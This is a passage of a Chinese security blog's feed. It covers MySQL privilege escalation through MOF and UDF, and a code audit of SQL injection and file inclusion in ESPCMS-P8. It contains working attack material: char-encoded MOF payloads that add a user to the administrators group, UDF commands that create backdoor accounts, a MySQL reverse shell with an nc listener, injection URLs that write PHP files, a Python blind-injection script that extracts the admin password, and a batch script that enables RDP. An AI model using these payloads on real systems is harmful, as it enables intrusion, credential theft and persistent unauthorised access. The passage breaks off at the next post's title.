,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';</span><br></pre></td></tr></table></figure></p><p>提升管理员<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';</span><br></pre></td></tr></table></figure></p><h2 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h2><h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限,udf提权也是一般应用于win2000、win2003系统</p><h3 id="利用条件-1"><a href="#利用条件-1" class="headerlink" title="利用条件"></a>利用条件</h3><p>1.Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。<br>2.Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。<br>3.掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。<br>4.可以将udf.dll写入到相应目录的权限。</p><h3 id="利用方式-1"><a href="#利用方式-1" class="headerlink" title="利用方式"></a>利用方式</h3><h4 id="将udf-dll导入到相应目录中"><a href="#将udf-dll导入到相应目录中" class="headerlink" title="将udf.dll导入到相应目录中"></a>将udf.dll导入到相应目录中</h4><p>查看数据库及操作系统的架构</p><blockquote><blockquote><p>select @@version_compile_os, @@version_compile_machine;</p></blockquote></blockquote><p>查看plugin文件夹</p><blockquote><blockquote><p>select @@plugin_dir ;<br>show variables like ‘%plugin%’;</p></blockquote></blockquote><p>5.1以上版本默认情况下/lib/plugin目录是不存在的,可以用NTFS ADS流来创建文件夹<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select @@basedir;//查找到mysql的目录 </span><br><span class="line">select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录</span><br><span class="line">select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录</span><br></pre></td></tr></table></figure></p><p>注:udf.dll可以在sqlmap/udf/mysql/windows中找到,sqlmap里的udf.dll是通过异或编码的,使用之前一定要记得解码,解码的工具也在sqlmap中,sqlmap/extra/cloak目录下的cloak.py.同时要注意这里的位数是mysql的位数,并不是对方系统的位数.</p><blockquote><blockquote><p>cloak.py -d -i udf.dll</p></blockquote></blockquote><p>msf中也有:/usr/share/metasploit-framework/data/exploits/mysql/</p><h4 id="使用方式"><a href="#使用方式" class="headerlink" title="使用方式"></a>使用方式</h4><p>创建</p><blockquote><blockquote><p>create function cmdshell returns string soname “lib_mysqludf_sys.dll”;<br>要创建udf中存在的函数才可以</p></blockquote></blockquote><p>使用</p><blockquote><blockquote><p>select cmdshell(‘net user hacker passwd /add’);</p></blockquote></blockquote><p>删除</p><blockquote><blockquote><p>drop function cmdshell;</p></blockquote></blockquote><h4 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h4><p>sys_exec 执行cmd;<br>sys_eval 该函数将执行系统命令并在屏幕上通过标准输出显示<br>sys_get 该函数使用’getenv’函数返回系统变量的值。 </p><h2 id="mysql反弹shell提权"><a href="#mysql反弹shell提权" class="headerlink" title="mysql反弹shell提权"></a>mysql反弹shell提权</h2><p>其实这也属于udf提权,只不过应用场景不同,比如现在我们没有webshell但是我们却有偶然得到了mysql的root密码(弱口令等),恰巧目标机的数据库可以外联或者有phpmyadmin,那么我们就可以把上面udf.dll文件的内容先插入到数据表中,然后再导出到/lib/plugin目录。<br>然后创建函数backshell</p><blockquote><blockquote><p>CREATE FUNCTION backshell RETURNS STRING SONAME ‘mysqldll.dll’; //创建backshell</p></blockquote></blockquote><p>在具备独立主机的服务器上执行监听</p><blockquote><blockquote><p>nc -vv -l -p 12345</p></blockquote></blockquote><p>最后就是执行backshell</p><blockquote><blockquote><p>select backshell(“你的ip地址”,12345);</p></blockquote></blockquote><h2 id="开启3389端口"><a href="#开启3389端口" class="headerlink" title="开启3389端口"></a>开启3389端口</h2><p>利用bat脚本<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">echo Windows Registry Editor Version 5.00>3389.reg</span><br><span class="line">echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg</span><br><span class="line">echo "fDenyTSConnections"=dword:00000000>>3389.reg</span><br><span class="line">echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg</span><br><span class="line">echo "PortNumber"=dword:00000d3d>>3389.reg</span><br><span class="line">echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg</span><br><span class="line">echo "PortNumber"=dword:00000d3d>>3389.reg</span><br><span class="line">regedit /s 3389.reg</span><br><span class="line">del 3389.reg</span><br></pre></td></tr></table></figure></p><p>利用sys_eval()等<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select sys_eval('REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f');</span><br></pre></td></tr></table></figure></p><p><双斜杠></p><h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p><a href="https://blog.csdn.net/he_and/article/details/81434865" target="_blank" rel="noopener">https://blog.csdn.net/he_and/article/details/81434865</a><br><a href="https://www.jianshu.com/p/5b34c1b6dee7" target="_blank" rel="noopener">https://www.jianshu.com/p/5b34c1b6dee7</a><br><a href="https://blog.csdn.net/qq_37053007/article/details/80143117" target="_blank" rel="noopener">https://blog.csdn.net/qq_37053007/article/details/80143117</a><br><a href="https://www.cnblogs.com/h4ck0ne/p/5154602.html" target="_blank" rel="noopener">https://www.cnblogs.com/h4ck0ne/p/5154602.html</a><br><a href="https://www.freebuf.com/articles/system/163144.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/system/163144.html</a></p>]]></content>
<summary type="html">
<h2 id="mof提权"><a href="#mof提权" class="headerlink" title="mof提权"></a>mof提权</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="提权" scheme="http://yoursite.com/tags/%E6%8F%90%E6%9D%83/"/>
</entry>
<entry>
<title>ESPCMS-P8前台SQL注入与文件包含漏洞</title>
<link href="http://yoursite.com/2019/03/21/ESPCMS-P8%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E4%B8%8E%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/"/>
<id>http://yoursite.com/2019/03/21/ESPCMS-P8前台SQL注入与文件包含漏洞/</id>
<published>2019-03-21T09:52:52.000Z</published>
<updated>2020-03-14T15:37:18.036Z</updated>
<content type="html"><![CDATA[<h1 id="前台SQL注入漏洞"><a href="#前台SQL注入漏洞" class="headerlink" title="前台SQL注入漏洞"></a>前台SQL注入漏洞</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>该SQL注入漏洞位于前台的搜索页面中,构造序列化的恶意参数通过SQL盲注或文件操作利用该漏洞.</p><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>在espcms_web/Search.php中有如下一段代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">if ($_GET['attr_array']) {</span><br><span class="line">$_REQUEST['attr_array'] = unserialize(stripslashes($_GET['attr_array']));</span><br><span class="line">}</span><br><span class="line">$attr_array = $_REQUEST['attr_array'] && is_array($_REQUEST['attr_array']) ? $_REQUEST['attr_array'] : array();</span><br><span class="line">if (is_array($attr_array) && count($attr_array) > 0) {</span><br><span class="line">foreach ($attr_array as $key => $value) {</span><br><span class="line">if ($value) {</span><br><span class="line">$db_att_where = " AND isclass=1 AND attrname='$key'";</span><br><span class="line">$countnum = espcms_db_num($db_table_model_att, $db_att_where);</span><br><span class="line">if ($countnum > 0) {</span><br><span class="line">if (is_array($value) && count($value) > 0) {</span><br><span class="line">$db_where_or = '';</span><br><span class="line">foreach ($value as $i => $where_val) {</span><br><span class="line">$db_where_or .= $i > 0 ? " OR FIND_IN_SET('$where_val',b.$key)" : " FIND_IN_SET('$where_val',b.$key)";</span><br><span class="line">}</span><br><span class="line">$db_where .= " AND ($db_where_or)";</span><br><span class="line">} else {</span><br><span class="line">$db_where .= " AND b.$key='$value'";</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该处将GET方式接收到的attr_array参数反序列化,然后将attr_array中的每一个键值对取出,如果$value不为空的话会执行下列语句:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">if ($value) {</span><br><span class="line">$db_att_where = " AND isclass=1 AND attrname='$key'"; //漏洞关键点</span><br><span class="line">$countnum = espcms_db_num($db_table_model_att, $db_att_where); //漏洞关键点</span><br><span class="line">if ($countnum > 0) {</span><br><span class="line">if (is_array($value) && count($value) > 0) {</span><br><span class="line">$db_where_or = '';</span><br><span class="line">foreach ($value as $i => $where_val) {</span><br><span class="line">$db_where_or .= $i > 0 ? " OR FIND_IN_SET('$where_val',b.$key)" : " FIND_IN_SET('$where_val',b.$key)";</span><br><span class="line">}</span><br><span class="line">$db_where .= " AND ($db_where_or)";</span><br><span class="line">} else {</span><br><span class="line">$db_where .= " AND b.$key='$value'";</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>$key的值会被拼接到$db_att_where字符串,然后$db_att_where被传入espcms_db_num()函数中,这个过程未做任何过滤,跟进espcms_db_num中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function espcms_db_num($tableName, $db_where = null, $num_str = '*') {</span><br><span class="line">global $espcms_link_db;</span><br><span class="line">if (!$tableName) {</span><br><span class="line">return false;</span><br><span class="line">}</span><br><span class="line">$sql_where = " WHERE 1=1" . $db_where;</span><br><span class="line">$db_sql = "SELECT COUNT($num_str) AS num FROM $tableName $sql_where";</span><br><span class="line">$db_read = $espcms_link_db->db_array_read($db_sql);</span><br><span class="line">return $db_read['num'];</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>$db_att_where被拼接到$db_sql中,仍然未做过滤,继续跟进至db_array_read():<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">public function db_array_read($sql) {</span><br><span class="line">$query = $this->db_query($sql);</span><br><span class="line">return $this->db_array_list($query);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>这里执行了数据库执行了$sql语句,由于从始至终都未做过滤,因此产生了SQL注入漏洞</p><h2 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h2><h3 id="写入文件"><a href="#写入文件" class="headerlink" title="写入文件"></a>写入文件</h3><p><a href="http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:69:"1'" target="_blank" rel="noopener">http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:69:"1'</a> union select “<?php phpinfo(); ?>” into dumpfile “c:\\1234.php”–+”;s:3:”aaa”;}&keyword=1 </p><p>可以写入一个php文件</p><h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p><a href="http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:64:"1'" target="_blank" rel="noopener">http://127.0.0.1/install_pack/index.php?ac=Search&at=List&attr_array=a:1:{s:64:"1'</a> union select if(ascii(substr(user(),1,1))=114,sleep(10),1)–+”;s:3:”aaa”;}&keyword=1<br>成功延迟10秒,说明用户名第一位是’r’</p><h2 id="py脚本"><a href="#py脚本" class="headerlink" title="py脚本"></a>py脚本</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">#!/python</span><br><span class="line">#coding = utf-8</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line"># target:</span><br><span class="line">url = "http://127.0.0.1"</span><br><span class="line"></span><br><span class="line">s = "/index.php?ac=Search&at=List&keyword=1&"</span><br><span class="line"># payload:</span><br><span class="line">payload = "attr_array=a:1:{s:104:\"1' union select if(ascii(substr((select admin_password from espcms_admin_member),%d,1))>%d,sleep(5),1)--+\";s:3:\"aaa\";}"</span><br><span class="line">payload2 = "attr_array=a:1:{s:105:\"1' union select if(ascii(substr((select admin_password from espcms_admin_member),%d,1))>%d,sleep(5),1)--+\";s:3:\"aaa\";}"</span><br><span class="line">payload4 = "attr_array=a:1:{s:106:\"1' union select if(ascii(substr((select admin_password from espcms_admin_member),%d,1))>%d,sleep(5),1)--+\";s:3:\"aaa\";}"</span><br><span class="line"></span><br><span class="line">def Get_User(lenth):</span><br><span class="line"> name = ''</span><br><span class="line"> x = 0</span><br><span class="line"> i = 1</span><br><span class="line"> while i<lenth+1:</span><br><span class="line"> try:</span><br><span class="line"> l = 0</span><br><span class="line"> r = 126</span><br><span class="line"> while l <= r:</span><br><span class="line"> x = (l + r) // 2</span><br><span class="line"> if x > 99 and i < 10:</span><br><span class="line"> target = url + s + payload2 % (i, x)</span><br><span class="line"> elif x < 99 and i < 10:</span><br><span class="line"> target = url + s + payload % (i, x)</span><br><span class="line"> elif x > 99 and i >= 10:</span><br><span class="line"> target = url + s + payload4 % (i,x)</span><br><span class="line"> else:</span><br><span class="line"> target = url + s + payload2 % (i,x)</span><br><span class="line"> print(target)</span><br><span class="line"> start_time = time.time()</span><br><span class="line"> response = requests.get(target, timeout = 20)</span><br><span class="line"> end_time = time.time()</span><br><span class="line"> print(x)</span><br><span class="line"> if end_time - start_time < 5 :</span><br><span class="line"> r = x - 1</span><br><span class="line"> else:</span><br><span class="line"> l = x + 1</span><br><span class="line"> x = (l + r) // 2 + 1</span><br><span class="line"> name = name + chr(x)</span><br><span class="line"> except requests.exceptions.ConnectionError:</span><br><span class="line"> response.status_code = "Connection refused"</span><br><span class="line"> print('retry....')</span><br><span class="line"> time.sleep(2)</span><br><span class="line"> i = i - 1</span><br><span class="line"> i += 1</span><br><span class="line"> return name</span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line"> print("start......\n")</span><br><span class="line"> name = Get_User(32)</span><br><span class="line"> print(name)</span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure><h1 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h1><h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>在espcms_web/Member.php中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">public static function in_JsLogin() {</span><br><span class="line">global $espcms_web_templates, $espcms_command;</span><br><span class="line">$espcms_web_templates->libfile = true;</span><br><span class="line">$member_app_config = ESPCMS_Core::get_app_config('member', false);</span><br><span class="line">if (!$member_app_config['isetup'] || !$member_app_config['isopen']) {</span><br><span class="line">ESPCMS_Dialog::Message_Page('app_close');</span><br><span class="line">}</span><br><span class="line">$member_con = unserialize($member_app_config['appconfig']);</span><br><span class="line">if (ESPCMS_MemberAuthority::authorityWebVerify(true)) {</span><br><span class="line">$member_info = ESPCMS_MemberAuthority::getMemberInfo();</span><br><span class="line">$filename = $_GET['info_file'] ? $_GET['info_file'] : 'member_info';</span><br><span class="line">$espcms_web_templates->into('member', $member_info);</span><br><span class="line">} else {</span><br><span class="line">$filename = $_GET['login_file'] ? $_GET['login_file'] : 'member_login';</span><br><span class="line">}</span><br><span class="line">$espcms_web_templates->into('tokenkey', token('member_login'));</span><br><span class="line">$espcms_web_templates->into('mlink', MemberLink::get_link());</span><br><span class="line">$espcms_web_templates->into('seccodelink', PublicLink::get_verfication('seccodelink'));</span><br><span class="line">$espcms_web_templates->into('verify_isopen', $member_con['MEMBER_LOGIN_VERIFY'] && $espcms_command['SAFETY_ISVERIFICATION_CODE'] ? 1 : 0);</span><br><span class="line">$espcms_web_templates->into('member_con', $member_con);</span><br><span class="line">$output = $espcms_web_templates->fetch('lib/' . $filename);</span><br><span class="line">$outHTML = addslashes($output);</span><br><span class="line">$textArray = preg_split('/[\r\n]/i', $outHTML);</span><br><span class="line">if (is_array($textArray)) {</span><br><span class="line">$outHTML = null;</span><br><span class="line">foreach ($textArray as $key => $value) {</span><br><span class="line">$outHTML .= 'document.write("' . $value . '");';</span><br><span class="line">}</span><br><span class="line">exit($outHTML);</span><br><span class="line">} else {</span><br><span class="line">exit('document.writeln("' . $outHTML . '")');</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该段代码先读入$filename参数,然后:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$out = $espcms_web_templates->fetch('lib/' . $filename);</span><br></pre></td></tr></table></figure></p><p>$filename被传入espcms_web_templates->fetch()中,跟进:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">public function fetch($fetch_filename, $cache_fileid = null, $out_html = null, $ispack = false) {</span><br><span class="line">......</span><br><span class="line">require_once 'ESPCMS_Templates_Parser.php';</span><br><span class="line">if ($this->libfile) {</span><br><span class="line">$fetch_filename = $this->templates_themss_dirname . $fetch_filename . $this->templatesfileex;</span><br><span class="line">$templates_filename = $this->templates_path_dir . $fetch_filename;</span><br><span class="line">} else {</span><br><span class="line">$templates_filename = $this->templates_path_dir . $fetch_filename;</span><br><span class="line">}</span><br><span class="line">$parsed_file = $this->html_compile_dir . md5($templates_filename) . '.php';</span><br><span class="line">if ($this->iscaching) {</span><br><span class="line">if ($this->tempcheckcache($fetch_filename, $cache_fileid)) {</span><br><span class="line">if (!file_exists($parsed_file) || filemtime($parsed_file) < filemtime($templates_filename)) {</span><br><span class="line">$this->_parser = new ESPCMS_Templates_Parser();</span><br><span class="line">$this->_parser->compile($fetch_filename, $this->templates_path_dir, $this->templates_themss_dirname, $this->html_compile_dir, $this->left_delimiter, $this->right_delimiter);</span><br><span class="line">}</span><br><span class="line">$this->tempcachesave($fetch_filename, $cache_fileid);</span><br><span class="line">$out = $this->template_out;</span><br><span class="line">} else {</span><br><span class="line">$out = $this->template_out;</span><br><span class="line">}</span><br><span class="line">} else {</span><br><span class="line">if (!file_exists($parsed_file) || filemtime($parsed_file) < filemtime($templates_filename)) {</span><br><span class="line">$this->_parser = new ESPCMS_Templates_Parser();</span><br><span class="line">$this->_parser->compile($fetch_filename, $this->templates_path_dir, $this->templates_themss_dirname, $this->html_compile_dir, $this->left_delimiter, $this->right_delimiter);</span><br><span class="line">}</span><br><span class="line">if ($this->libfile) {</span><br><span class="line">$out = $this->temprequire($parsed_file);</span><br><span class="line">} else {</span><br><span class="line">$out = file_get_contents($parsed_file);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p><p>其中$parsed_file是由传入的MD5($filename)加路径构成的php文件,跟进后发现如果$filename最近改动过的话会重新将其传入$parsed_file中,然后$parsed_file传入$this->temprequire()中,如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">} else {</span><br><span class="line">if (!file_exists($parsed_file) || filemtime($parsed_file) < filemtime($templates_filename)) {</span><br><span class="line">$this->_parser = new ESPCMS_Templates_Parser();</span><br><span class="line">$this->_parser->compile($fetch_filename, $this->templates_path_dir, $this->templates_themss_dirname, $this->html_compile_dir, $this->left_delimiter, $this->right_delimiter);</span><br><span class="line">}</span><br><span class="line">if ($this->libfile) {</span><br><span class="line">$out = $this->temprequire($parsed_file);</span><br><span class="line">} else {</span><br><span class="line">$out = file_get_contents($parsed_file);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>$this->temprequire()函数中会包含$parsed_file:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">private function temprequire($filename) {</span><br><span class="line">ob_start();</span><br><span class="line">include $filename; //关键点</span><br><span class="line">$content = ob_get_contents();</span><br><span class="line">ob_end_clean();</span><br><span class="line">return $content;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><h2 id="poc-1"><a href="#poc-1" class="headerlink" title="poc"></a>poc</h2><p>结合第一个漏洞获取后台账户密码后登入后台,然后更改模板文件(随意更改一个),初始目录是/cn/lib/,可以使用../进行目录穿越,在特定情况下还会造成目录暴露,例如修改cn/index.html文件.<br>最后在前台访问:10.10.10.132/install_pack/index.php?ac=Member&at=JsLogin&login_file=../index<br>即执行恶意代码.</p>]]></content>
<summary type="html">
<h1 id="前台SQL注入漏洞"><a href="#前台SQL注入漏洞" class="headerlink" title="前台SQL注入漏洞"></a>前台SQL注入漏洞</h1><h2 id="简介"><a href="#简介" class="headerlink"
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="代码审计" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>sqlmap与一次渗透实战</title>
